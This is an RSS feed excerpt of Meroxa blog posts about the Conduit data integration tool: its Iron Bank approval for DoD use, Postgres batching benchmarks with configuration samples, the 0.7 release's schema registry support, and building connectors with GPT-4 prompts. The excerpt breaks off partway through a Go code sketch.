&lt;p&gt;&lt;a href=&quot;https://software.af.mil/dsop/services/&quot;&gt;Iron Bank&lt;/a&gt; is a DoD repository of digitally signed, binary container images including both Free and Open-Source Software (FOSS) and Commercial Off-The-Shelf (COTS) software. It is a centralized repository for container images that have been hardened and evaluated for security. This makes it easier for DoD organizations to find and use secure container images, and to quickly and easily deploy applications. Approved containers in Iron Bank have DoD-wide reciprocity across all classifications, accelerating down to weeks a security process that can otherwise take months or even years.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Why Go the Iron Bank Route?&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;The DoD was interested in using Conduit to build connections within the Department of the Air Force (DAF) Data Fabric and between disparate systems to bridge gaps. However, Conduit had not been through the specific group’s software review and compliance process, which could have taken months to complete…months we didn’t have. To move forward rapidly and to set Meroxa up for success in the future, placing Conduit in Iron Bank made the most sense. By going the Iron Bank route, we were quickly able to get Conduit in Iron Bank and subsequently scanned and approved for use with flying colors in under a week.&lt;/p&gt;
&lt;p&gt;Another benefit of having Conduit in Iron Bank is accessibility - being able to direct other DoD teams to an approved version of Conduit that they can download and use the same day without issue is a game changer. Long gone are the days of us going through various different approval processes for different projects to get the same outcome.&lt;/p&gt;
&lt;p&gt;In addition to what was mentioned above, here are some other benefits to having your software in Iron Bank for the purpose of working with the DoD:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Increased security: Iron Bank container images are hardened and evaluated for security, which helps reduce the risk of vulnerabilities being introduced into DoD applications.&lt;/li&gt;
&lt;li&gt;Increased efficiency: Iron Bank centralizes the process of finding and using secure container images, which saves DoD organizations time and resources.&lt;/li&gt;
&lt;li&gt;Reduced risk: Iron Bank helps reduce the risk of DoD applications being compromised by vulnerabilities.&lt;/li&gt;
&lt;li&gt;Improved compliance: Iron Bank helps DoD organizations comply with security regulations.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;With those benefits in mind, you can see how having our offerings in Iron Bank would bring our customers peace of mind and allow both parties to not spend huge amounts of time and money on software reviews and testing.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Strengths of Conduit&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;We’ve touched a bit on how we’re using Conduit in the DoD to build data pipelines with the DAF Data Fabric, but I wanted to list out some other reasons why the DoD has opted to use Conduit in lieu of other products.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Efficient Binary Protocol&lt;/strong&gt; - Uses a binary encoding format that is smaller and faster to serialize and deserialize compared to other formats. This makes it an efficient choice for transmitting large amounts of data.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Bi-directional Stream Support&lt;/strong&gt; - The client and server can read and write messages in any order, as the two streams are independent.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Resilient Connectivity&lt;/strong&gt; - Conduit is able to provide and maintain an acceptable level of service in the face of faults and challenges to normal operation.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Rate Limiting/Traffic Shaping&lt;/strong&gt; - Controls the flow and distribution of traffic from the internet so your infrastructure never becomes overloaded and risks failing.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;End-to-End Encryption&lt;/strong&gt; - Keeps communications secure.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Lightweight&lt;/strong&gt; - Can be compiled down to a binary that’s single-digit megabytes, and connectors use megabytes of RAM. In comparison, Kafka Connect is roughly 500-600 megabytes for all of the packages, connectors, etc. A single Postgres connector, for example, can consume close to a gigabyte of RAM on its own.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;With all of the benefits of Conduit plus the assurance of knowing that it’s a secure and compliant piece of software, it’s clear why the government has opted to use us.&lt;/p&gt;
&lt;p&gt;If you are a developer working for the Department of Defense and need access to Conduit, you can download it from Iron Bank and install it right into your development environment. Federal government agencies and DoD DevSecOps teams always have access to the latest, accredited version of Conduit, which has been fully vetted and approved for deployment by the DoD Iron Bank DevSecOps team. For those outside of the DoD who are interested in Conduit, visit &lt;a href=&quot;https://conduit.io/&quot;&gt;conduit.io&lt;/a&gt; here to download and view documentation on how to use Conduit.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Harnessing the Power of Batching in Conduit Connectors]]></title><description><![CDATA[Explore batching in Conduit connectors for improved data pipeline performance. Understand how it boosts throughput and scalability.]]></description><link>https://meroxa.com/blog/conduit-harnessing-the-power-of-batching</link><guid isPermaLink="false">https://meroxa.com/blog/conduit-harnessing-the-power-of-batching</guid><dc:creator><![CDATA[Lovro Mažgon]]></dc:creator><pubDate>Wed, 23 Aug 2023 18:10:20 GMT</pubDate><content:encoded>&lt;p&gt;The performance of Conduit data pipelines directly depends on the efficiency of connectors. As the ecosystem of Conduit connectors expanded across various data resources, we recognized the need for a robust and scalable solution that could boost performance uniformly across all connectors. In this blog post, we explore the impact of implementing batching in the Conduit connector SDK, which emerged as the perfect solution promising to elevate the performance of our connectors to the next level.&lt;/p&gt;
&lt;p&gt;While our motivation was to enhance the performance of any destination connector, we selected the Postgres connector as a focal point to showcase the results that batching could deliver. Batching unlocked the true potential of the connector, improving the processing rate by a factor of 20. Bear in mind that similar improvements can be expected in other connectors.&lt;/p&gt;
&lt;h2&gt;Understanding Batching&lt;/h2&gt;
&lt;p&gt;The efficiency of record processing plays a critical role in the overall performance of data pipelines. Batching is a powerful technique that can significantly improve connector performance. In this section, we delve into the concept of batching, its inner workings, and the benefits it brings to data processing.&lt;/p&gt;
&lt;h3&gt;What is Batching?&lt;/h3&gt;
&lt;p&gt;Batching involves grouping multiple data records together and processing them as cohesive units. Instead of handling individual records one by one, batching allows us to bundle operations, such as database queries or API calls, into a single larger request.&lt;/p&gt;
&lt;p&gt;The beauty of batching lies in its ability to reduce the overhead incurred by processing individual requests separately. By aggregating multiple requests into a single batch, we significantly reduce the number of round trips between the connector and the data resource, minimizing the latency associated with each operation.&lt;/p&gt;
&lt;h3&gt;Benefits of Batching&lt;/h3&gt;
&lt;p&gt;Batching offers wide-ranging benefits:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Reduced network overhead&lt;/strong&gt;: Batching considerably reduces the number of network requests, lowering the overall network overhead and enhancing the efficiency of data transmission.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Improved throughput&lt;/strong&gt;: Batching enables connectors to process a larger volume of data requests simultaneously, boosting the overall throughput of data pipelines.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Reduced latency&lt;/strong&gt;: This one may be counter-intuitive, but batching can actually reduce the latency when the rate of produced records gets closer to the limit of the non-batching approach. Fewer round trips between the connector and the data resource result in a higher throughput thus reducing the average latency.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Enhanced scalability&lt;/strong&gt;: By optimizing the processing of multiple records in batches, the connector becomes more scalable as it reduces the pressure on the destination resource.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Resource optimization&lt;/strong&gt;: Batching reduces the strain on system resources, allowing for more efficient utilization of server capacity, computing power and network bandwidth.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Versatility of Batching&lt;/h3&gt;
&lt;p&gt;One of the key advantages of batching lies in its adaptability across various types of connectors and resources. Whether connecting to relational databases like Postgres, NoSQL databases, APIs, or other data systems, batching can be applied as a unifying performance enhancement strategy regardless of the data resource.&lt;/p&gt;
&lt;h2&gt;Implementing Batching in the Connector SDK&lt;/h2&gt;
&lt;p&gt;In this section, we delve into the nitty-gritty of implementing batching in the &lt;a href=&quot;https://github.com/conduitio/conduit-connector-sdk&quot;&gt;Connector SDK&lt;/a&gt;. We will explore the technical intricacies, design considerations, and challenges faced during this process.&lt;/p&gt;
&lt;h3&gt;No breaking changes&lt;/h3&gt;
&lt;p&gt;&lt;em&gt;“Forethought spares afterthought.”&lt;/em&gt; - Amelia E. Barr&lt;/p&gt;
&lt;p&gt;When we designed the Connector SDK interfaces, we had the foresight that there would come a time when implementing batching would be crucial for achieving optimal performance in destination connectors. Therefore, we laid the groundwork by preparing the interface to handle batches, even though the SDK initially only provided a single record per batch. This forward-thinking approach allowed us to seamlessly implement batching in the Connector SDK without the need for breaking changes.&lt;/p&gt;
&lt;p&gt;The interface draws inspiration from Go&apos;s &lt;a href=&quot;https://pkg.go.dev/io#Writer&quot;&gt;io.Writer&lt;/a&gt; and provides developers with a familiar and intuitive way to work with batches. Here&apos;s the relevant interface definition:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token output&quot;&gt;type Destination interface {
    // Write writes len(r) records from r to the destination right away without
    // caching. It should return the number of records written from r
    // (0 &amp;lt;= n &amp;lt;= len(r)) and any error encountered that caused the write to
    // stop early. Write must return a non-nil error if it returns n &amp;lt; len(r).
    Write(ctx context.Context, r []Record) (n int, err error)
}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;This interface makes the Connector SDK responsible for collecting records into batches, allowing the behavior to be centralized and tested without the need to repeat it in individual connectors.&lt;/p&gt;
&lt;h3&gt;Batching middleware&lt;/h3&gt;
&lt;p&gt;In the &lt;a href=&quot;https://pkg.go.dev/github.com/conduitio/conduit-connector-sdk#hdr-Destination&quot;&gt;Connector SDK documentation&lt;/a&gt; we encourage developers to include the default middleware unless they have a very good reason not to. Most connectors therefore benefit from new middleware as soon as they update to a new SDK version. We used this to our advantage by adding a new batching middleware that enables the batching behavior in virtually all connectors.&lt;/p&gt;
&lt;h3&gt;Batching strategies&lt;/h3&gt;
&lt;p&gt;The middleware introduced in the previous section injects two parameters into the connector specifications:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code class=&quot;language-text&quot;&gt;sdk.batch.size&lt;/code&gt; - This option sets the maximum number of records in a batch. Once a record is added to the batch and the limit is reached, the whole batch gets flushed synchronously to the destination connector.&lt;/li&gt;
&lt;li&gt;&lt;code class=&quot;language-text&quot;&gt;sdk.batch.delay&lt;/code&gt; - The maximum delay before an incomplete batch is written to the destination. The delay is measured from the time the first record gets added to the batch. This option essentially controls the maximum latency added to a record because of batching.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;These strategies ensure users can tailor the batching behavior to suit their specific needs and optimize performance accordingly. If you are interested in the internals of these strategies you&apos;re welcome to take a look at the &lt;a href=&quot;https://github.com/ConduitIO/conduit-connector-sdk/blob/main/internal/batcher.go&quot;&gt;batcher implementation&lt;/a&gt;.&lt;/p&gt;
&lt;h3&gt;Transactional integrity and error handling&lt;/h3&gt;
&lt;p&gt;In Conduit, all records are strictly ordered. This guarantee extends to batches, where records in a batch maintain their order from the oldest (received first) to the youngest (received last). The connector is free to decide whether it stores all records in a single transaction or treats them independently; however, it needs to write the records in the correct order. This means that, in the event of a failure, a connector can fail to write part of the batch, as long as there&apos;s an index that divides the batch into two parts: successfully written records should be to the left of that index, while failed records are to the right.&lt;/p&gt;
&lt;p&gt;In case of a failure, the connector can return the number of successfully written records and an error. The SDK will positively acknowledge the first n records and use the error to negatively acknowledge the rest. The write is considered completely successful only if the number of successfully written records matches the size of the batch.&lt;/p&gt;
&lt;p&gt;If the connector follows this behavior, Conduit is able to guarantee the correct order of records in the data pipeline and at-least-once delivery of all records.&lt;/p&gt;
&lt;h2&gt;Benchmarking using the Postgres Connector&lt;/h2&gt;
&lt;p&gt;With the batching implementation in place, it was time to put it to the test. We conducted benchmarks using the Postgres connector to evaluate the impact of different batch sizes on throughput and latency.&lt;/p&gt;
&lt;h3&gt;Configuring the pipeline&lt;/h3&gt;
&lt;p&gt;We decided to run a simple pipeline that uses the built-in &lt;a href=&quot;https://github.com/ConduitIO/conduit-connector-generator&quot;&gt;generator&lt;/a&gt; connector as the source and the &lt;a href=&quot;https://github.com/ConduitIO/conduit-connector-postgres&quot;&gt;Postgres&lt;/a&gt; connector as the destination. The generator constantly produces records as fast as possible, which makes the throughput of the pipeline completely dependent on the throughput of the destination connector.&lt;/p&gt;
&lt;p&gt;We tested the pipeline with different batch sizes, from 1 (no batching) to 10, 100, 1,000 and 10,000.&lt;/p&gt;
&lt;p&gt;Here is the configuration file for the pipeline:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token output&quot;&gt;version: 2.0
pipelines:
  - id: generator-to-pg
    status: running
    connectors:
      - id: gen
        type: source
        plugin: builtin:generator
        settings:
          format.type: structured
          format.options: &quot;id:int,first_name:string,last_name:string&quot;
      - id: pg
        type: destination
        plugin: builtin:postgres
        settings:
          url: &quot;postgres://meroxauser:meroxapass@localhost:5432/meroxadb?sslmode=disable&quot;
          table: &quot;batch_test&quot;
          # Tested batch sizes: 1 (no batching), 10, 100, 1000, 10000.
          sdk.batch.size: 1000
          # Batch delay is not relevant, records are constantly produced and
          # flushed before the delay is reached.
          sdk.batch.delay: 1s
    processors:
      # The generator produces a raw key, we use a processor to hoist it
      # into a structured payload, needed by the Postgres connector.
      - id: hoist
        type: hoistfieldkey
        settings:
          field: &quot;key&quot;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We also prepared the table in the target database in advance:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token output&quot;&gt;CREATE TABLE batch_test (
  id int,
  first_name varchar(255),
  last_name varchar(255),
  key varchar(255)
);&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h3&gt;Collecting metrics&lt;/h3&gt;
&lt;p&gt;While the pipelines were running, we collected and monitored &lt;a href=&quot;https://conduit.io/docs/features/metrics&quot;&gt;Conduit metrics&lt;/a&gt; using &lt;a href=&quot;https://prometheus.io/&quot;&gt;Prometheus&lt;/a&gt; and &lt;a href=&quot;https://grafana.com/&quot;&gt;Grafana&lt;/a&gt;. We focused mainly on the metric &lt;code class=&quot;language-text&quot;&gt;conduit_pipeline_execution_duration_seconds&lt;/code&gt;. This is a collection of metrics that together represent a &lt;a href=&quot;https://prometheus.io/docs/concepts/metric_types/#histogram&quot;&gt;Prometheus histogram&lt;/a&gt; tracking the time a single record spends in the pipeline, from the moment it is received by the source to the moment it is acknowledged by the destination.&lt;/p&gt;
&lt;p&gt;We monitored the metric using two Grafana graphs:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;A &lt;a href=&quot;https://grafana.com/docs/grafana/latest/panels-visualizations/visualizations/heatmap/&quot;&gt;heatmap&lt;/a&gt; showing the end-to-end latencies of records traveling through the pipeline.&lt;/li&gt;
&lt;li&gt;A &lt;a href=&quot;https://grafana.com/docs/grafana/latest/panels-visualizations/visualizations/time-series/&quot;&gt;time series&lt;/a&gt; line graph showing the throughput of the pipeline in records per second over time.&lt;/li&gt;
&lt;/ul&gt;
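&lt;p&gt;For illustration, Prometheus queries along the following lines can drive such graphs. The &lt;code class=&quot;language-text&quot;&gt;_bucket&lt;/code&gt; and &lt;code class=&quot;language-text&quot;&gt;_count&lt;/code&gt; series are the standard suffixes Prometheus exposes for any histogram; label filters for a specific pipeline are omitted here:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token output&quot;&gt;# 99th-percentile end-to-end latency over the last minute
histogram_quantile(0.99, sum by (le) (rate(conduit_pipeline_execution_duration_seconds_bucket[1m])))

# pipeline throughput in records per second
rate(conduit_pipeline_execution_duration_seconds_count[1m])&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;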
&lt;p&gt;If you are interested in graphing these values for your Conduit instance, have a look at &lt;a href=&quot;https://github.com/conduitio-labs/prom-graf&quot;&gt;conduitio-labs/prom-graf&lt;/a&gt;, a simple project that provides the necessary services and pre-configured dashboards.&lt;/p&gt;
&lt;h3&gt;Results&lt;/h3&gt;
&lt;p&gt;We ran the benchmarks on a 2019 MacBook Pro with a 2.3 GHz 8-core Intel Core i9 processor and 32 GB of RAM. Each pipeline ran for exactly 1 minute on a clean slate (fresh database and fresh Conduit instance).&lt;/p&gt;
&lt;p&gt;The results speak for themselves:&lt;img src=&quot;https://20285798.fs1.hubspotusercontent-na1.net/hubfs/20285798/Screenshot%202023-08-23%20at%203.07.08%20PM.png&quot; alt=&quot;Harnessing the Power of Batching in Conduit Connectors: Throughput and Latency Table&quot;&gt;&lt;/p&gt;
&lt;p&gt;Here is the same data represented in a graph:&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://lh6.googleusercontent.com/5SL6aBtVk9jQ7fgQLcS2SBrYu8vFso3r2Pc-mBHkmTfr8Szbt0B0Wp12QK_lFHTZZ3afw1ak9tBi3AmgxmG7r6dkulCgHAMswUN7wtX-fzzkim0UzeZuT4R6vlg3r-urBSpz7edRvtke5oW3mmdz4js&quot; alt=&quot;Harnessing the Power of Batching in Conduit Connectors: Throughput and Latency Chart&quot;&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Throughput&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;We can observe the throughput starting at 822 records per second with batching disabled and increasing to over 16,000 records per second with a batch size of 10,000. That&apos;s an increase in throughput by a factor of 20!&lt;/p&gt;
&lt;p&gt;The biggest jump in throughput came in the first step, when we increased the batch size from 1 to 10: it improved the performance of the pipeline by a factor of 6.5. The next step, going to 100, further improved the performance by a factor of 2.4. Further increases in the batch size still had a noticeable effect, although not as extreme as the first two steps.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Latency&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;The common assumption might be that batching inherently increases latency, as records are held to be flushed together. This holds true when the incoming record stream is relatively slow. However, as the workload increases, the latency can rise sharply when records start waiting on previous ones to be flushed. In such scenarios, batching can actually reduce latency while improving throughput by minimizing these waiting times.&lt;/p&gt;
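&lt;p&gt;A back-of-the-envelope model makes this concrete (the numbers below are hypothetical, not taken from our benchmark). Suppose a destination flush costs roughly the same whether it carries 1 record or 10, and 10 records arrive at once:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token output&quot;&gt;t_flush = 1 ms per flush (hypothetical)

unbatched: record i completes after i × t_flush
           average latency = (1 + 2 + ... + 10) / 10 × t_flush = 5.5 ms
batched:   all 10 records complete after a single flush ≈ 1 ms&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Under load, the time spent waiting on previous flushes dominates, which is why batching can lower latency even though records are briefly held back.&lt;/p&gt;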
&lt;p&gt;This graph demonstrates when batching can improve the latency:&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://lh5.googleusercontent.com/nzdwYf1qa8oTvhOKyGjWBmzmvUeEwun4UpcfGFLFZGfYyxCzWCAdI-XwIjBw7vkuvsPI2QlqxoQE0IEqpebyk7t7DUHW4b5B19yK79WCEvpt0CwCLfPlzoPgwAwOtQAPb5UdqxPoLtL7fF_LCCg8PeE&quot; alt=&quot;Harnessing the Power of Batching in Conduit Connectors: Throughput and Latency Graph&quot;&gt;&lt;/p&gt;
&lt;p&gt;This is exactly what we observed in our results. Enabling batching with a batch size of 10 dropped the latency from 13.7ms to 3.5ms. Increasing the batch size beyond that raised the latency again, as bigger batches naturally take longer to collect and flush. A batch size of 100 still had a lower latency than the pipeline without batching, while batch sizes of 1,000 and 10,000 showed a sharp increase in latency.&lt;/p&gt;
&lt;h3&gt;Conclusion&lt;/h3&gt;
&lt;p&gt;The benchmark results conclusively demonstrate that batching plays a pivotal role in improving the performance of our connectors. With larger batch sizes, we achieved substantially higher throughput and in some cases even lower average latencies, which translates into faster data processing overall.&lt;/p&gt;
&lt;p&gt;We found that the sweet spot for significant performance gains was a batch size of around 100. At this batch size, the throughput showed a notable increase compared to the non-batching configuration (&gt;15x), and the average latency was halved. While larger batch sizes continued to increase pipeline throughput, they also incurred higher latency, so the choice of batch size depends on the priorities of the specific use case. If high throughput matters more than low latency, larger batch sizes are still applicable.&lt;/p&gt;
&lt;p&gt;The decision on what batch size to use is ultimately in your hands as the user. It will depend on different factors like the expected amount of records per second, the size of the records, the spikiness of the load, what latency is acceptable, etc. You need to carefully think about these factors and, if possible, gather actual information about the incoming data stream to make an educated decision about the appropriate batch size.&lt;/p&gt;
&lt;h2&gt;Final thoughts&lt;/h2&gt;
&lt;p&gt;Looking back on our decision to implement batching, we recognize that it has positioned the Connector SDK for the future. Batching provides the scalability, efficiency and flexibility needed to handle high-load pipelines. With this feature, we are able to lower the latencies as well as increase the throughput in virtually every destination connector across the board.&lt;/p&gt;
&lt;p&gt;We encourage you to try out &lt;a href=&quot;https://conduit.io/&quot;&gt;Conduit&lt;/a&gt; and let us know what you think!&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Conduit 0.7]]></title><description><![CDATA[Conduit 0.7 gets us one step closer to being a fully functioning, feature-rich alternative to Kafka Connect.]]></description><link>https://meroxa.com/blog/conduit-0.7-is-here</link><guid isPermaLink="false">https://meroxa.com/blog/conduit-0.7-is-here</guid><dc:creator><![CDATA[Rimas Silkaitis]]></dc:creator><pubDate>Wed, 19 Jul 2023 04:15:00 GMT</pubDate><content:encoded>&lt;p&gt;Welcome to another release of Conduit! We’ve always thought of Conduit as a Kafka Connect replacement that could do so much more, like move data and run elaborate pipelines. In this release, we get closer to that original goal of a Kafka Connect replacement with our biggest feature, Native Schema Registry support.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Native Schema Registry Support&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;A schema registry is a great tool for storing metadata about the information flowing through pipelines. The metadata can describe which fields are required, which fields are optional, and which data types are enforced. Also, with a schema, the data in a pipeline can be encoded in a more space-efficient format. As a developer, this gives you more confidence that what gets sent into the pipeline is what you’re expecting.&lt;/p&gt;
&lt;p&gt;We’re excited to announce &lt;a href=&quot;https://github.com/ConduitIO/conduit/issues/984&quot;&gt;native schema registry support&lt;/a&gt; in Conduit. Interacting with a schema registry within a Conduit pipeline is done via one of four built-in processors:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://conduit.io/docs/processors/builtin#decodewithschemakey&quot;&gt;Decode with Schema Key&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://conduit.io/docs/processors/builtin#decodewithschemapayload&quot;&gt;Decode with Schema Payload&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://conduit.io/docs/processors/builtin#encodewithschemakey&quot;&gt;Encode with Schema Key&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://conduit.io/docs/processors/builtin#encodewithschemapayload&quot;&gt;Encode with Schema Payload&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;To add this ability to your pipeline, all you need to do is reference one of the aforementioned processors in the processors section of your pipeline configuration:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token output&quot;&gt;processors:
  - id: example
    type: decodewithschemakey
    settings:
      url:                 &quot;http://localhost:8085&quot;
      auth.basic.username: &quot;user&quot;
      auth.basic.password: &quot;pass&quot;
      tls.ca.cert:         &quot;/path/to/ca/cert&quot;
      tls.client.cert:     &quot;/path/to/client/cert&quot;
      tls.client.key:      &quot;/path/to/client/key&quot;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Currently, the built-in schema registry processors only support Avro, but we’re looking to include more formats in future releases, such as Protobuf and JSON Schema.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;gRPC Connector&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;While not necessarily part of Conduit itself, we’re excited to announce the &lt;a href=&quot;https://github.com/conduitio-labs/conduit-connector-grpc-server&quot;&gt;gRPC Server&lt;/a&gt; and &lt;a href=&quot;https://github.com/conduitio-labs/conduit-connector-grpc-client&quot;&gt;Client&lt;/a&gt; Conduit connectors. This is super interesting because it now allows Conduit to be used in distributed environments. For example, let’s say you need to aggregate data in one place and forward it to another site.&lt;img src=&quot;https://lh4.googleusercontent.com/aKffuM5aNGpAKrgIc_dTFLOLESmIXdBYvnAyXWMj3ZNEXmgCxC84sU17CFBbwLGmb4D_81OkeJQAmIQSOPXVkQTz0uS8d7Dpz1Zq-vLdteV5i9XzZXOCvz4syjIJjh0mg3FuRQw2gd3axpbbv-F5VrA&quot; alt=&quot;gRPC Connector diagram&quot;&gt;The image demonstrates that you can have one Conduit instance running on Remote Site A and, using the Conduit gRPC Server and Client connectors, forward the data to Remote Site B. This is functionality we use internally to move data between regions within AWS. There are still a number of features to be added to these connectors, but it’s a start at enabling these distributed scenarios.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;We’d love your feedback too!&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;As always, we’d love to get your feedback! If you want to see the full list of what is included in this release, check out the &lt;a href=&quot;https://github.com/ConduitIO/conduit/releases/tag/v0.7.0&quot;&gt;Conduit Changelog&lt;/a&gt; and the &lt;a href=&quot;https://docs.conduit.io/docs/introduction/getting-started/&quot;&gt;documentation&lt;/a&gt;. Also, feel free to join us on &lt;a href=&quot;https://discord.com/invite/pN24QPca6b&quot;&gt;Discord&lt;/a&gt; or &lt;a href=&quot;https://twitter.com/conduitio&quot;&gt;Twitter&lt;/a&gt;.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Building Streaming Data Connectors Faster with OpenAI’s GPT-4]]></title><description><![CDATA[Learn how OpenAI's GPT-4 has helped to streamline data connector building for Meroxa, reducing development time and effort.]]></description><link>https://meroxa.com/blog/building-connectors-faster-openai-gpt-4</link><guid isPermaLink="false">https://meroxa.com/blog/building-connectors-faster-openai-gpt-4</guid><dc:creator><![CDATA[William Hill]]></dc:creator><pubDate>Fri, 02 Jun 2023 13:53:16 GMT</pubDate><content:encoded>&lt;p&gt;The responsibility of connecting different data stores has historically fallen to an entire team of developers who write custom code and manage complex data integrations. Conduit, an open-source project powered by Meroxa, has made this undertaking a lot simpler. We designed the Conduit SDK with data movement best practices in mind, requiring fewer developers to build out pipelines with the same level of efficacy but with greater efficiency. If you’re unfamiliar, Conduit is a data integration tool for developers built to move data from point A to point B, which it does via connectors. By adding OpenAI’s GPT-4 into the mix to speed up the build of connectors, connecting data sources has become a breeze for us.
In this blog post, we’ll go over why speeding up connector building was necessary and how we were able to accomplish it via GPT-4.&lt;/p&gt;
&lt;h2&gt;Why Did We Need to Reduce Connector Build Time?&lt;/h2&gt;
&lt;p&gt;On the government side of our business, we operate as a small, lean team with multiple efforts happening in tandem. One of those efforts is a project with the United States Space Force to build data pipelines from commercial and government providers to a central repository or library where the aggregated data can be easily accessed and utilized. Getting those pipelines built quickly is of the utmost importance to the customer due to demand, so reducing the time to build connectors without burdening our team was essential. Not only is reducing build time beneficial for the government team, but it’s also beneficial to our company and our users as a whole. This worthwhile investment will pay dividends down the road.&lt;/p&gt;
&lt;h2&gt;How Did We Accomplish This?&lt;/h2&gt;
&lt;p&gt;Well, the title of this blog post and the opening paragraph give the answer away: we used OpenAI’s GPT-4 😂. We ultimately chose it because it reduces the time to build a connector by automatically generating high-quality code, configuration templates, and documentation, significantly speeding up the development process. It helped us iterate rapidly through dev cycles, finding potential issues and providing helpful insights, greatly reducing the time and effort required to build data pipelines.&lt;/p&gt;
&lt;p&gt;By harnessing this capability, we successfully reduced the development time of connectors. By feeding Conduit connector code to GPT-4, we enabled the model to learn and generate connector code from prompts, streamlining the development process. Here are the system prompts we used to direct GPT-4 in building the connector:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;You are an expert Go developer.&lt;/li&gt;
&lt;li&gt;Conduit is an open-source data integration tool written in Go.&lt;/li&gt;
&lt;li&gt;Here is the &lt;a href=&quot;https://github.com/ConduitIO/conduit-connector-sdk&quot;&gt;code&lt;/a&gt; for the Conduit Connector SDK for a Source Connector.&lt;/li&gt;
&lt;li&gt;Here is the &lt;a href=&quot;https://github.com/ConduitIO/conduit-connector-kafka&quot;&gt;code&lt;/a&gt; for an example Source Connector for Kafka.&lt;/li&gt;
&lt;li&gt;Write a source connector for &lt;code class=&quot;language-text&quot;&gt;&amp;lt;insert connector you want to build here&gt;&lt;/code&gt;. &lt;code class=&quot;language-text&quot;&gt;CODE ONLY&lt;/code&gt;.&lt;/li&gt;
&lt;/ul&gt;
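&lt;p&gt;For context, the kind of output we were after is a source connector skeleton along these lines. This is an illustrative sketch rather than actual GPT-4 output; the method names follow the Connector SDK source interface, but consult the SDK documentation for the exact signatures in the current version:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token output&quot;&gt;// Package myconn is a hypothetical example connector.
package myconn

import (
    &quot;context&quot;

    sdk &quot;github.com/conduitio/conduit-connector-sdk&quot;
)

type Source struct {
    sdk.UnimplementedSource

    config map[string]string
}

func NewSource() sdk.Source {
    return new(Source)
}

// Configure validates and stores the user-provided configuration.
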